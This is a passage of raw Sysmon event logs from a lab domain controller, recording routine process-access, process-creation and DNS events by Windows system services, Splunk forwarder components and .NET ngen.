ows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9094-6005-2001-00000000A301}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9094-6005-2001-00000000A301}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.050{59A5CD1D-9094-6005-2001-00000000A301}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9095-6005-2201-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:49.987{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9095-6005-2201-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.987{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9095-6005-2201-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:49.988{59A5CD1D-9095-6005-2201-00000000A301}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:57.112{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000005193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:58.862{59A5CD1D-8E46-6005-1600-00000000A301}15443460C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:43:58.862{59A5CD1D-8E46-6005-1600-00000000A301}15443460C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000005194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:57.018{59A5CD1D-8E46-6005-1000-00000000A301}1164WIN-DC-4950fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 10341000x80000000000000005308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.831{59A5CD1D-90A0-6005-2B01-00000000A301}44362516C:\Windows\system32\conhost.exe{59A5CD1D-90A0-6005-2E01-00000000A301}4712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:00.831{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2E01-00000000A301}4712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.831{59A5CD1D-90A0-6005-2A01-00000000A301}32401372C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe{59A5CD1D-90A0-6005-2E01-00000000A301}4712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.dll+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.DLL+32979|UNKNOWN(00007FF8288A5147) 10341000x80000000000000005305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.799{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-90A0-6005-2D01-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.799{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-90A0-6005-2D01-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.784{59A5CD1D-90A0-6005-2B01-00000000A301}44362516C:\Windows\system32\conhost.exe{59A5CD1D-90A0-6005-2D01-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.784{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2D01-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 
10341000x80000000000000005301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.784{59A5CD1D-90A0-6005-2A01-00000000A301}32401372C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe{59A5CD1D-90A0-6005-2D01-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.dll+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.DLL+32979|UNKNOWN(00007FF8288A5147) 10341000x80000000000000005300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.706{59A5CD1D-90A0-6005-2C01-00000000A301}27922760C:\Windows\system32\conhost.exe{59A5CD1D-90A0-6005-2901-00000000A301}4440C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 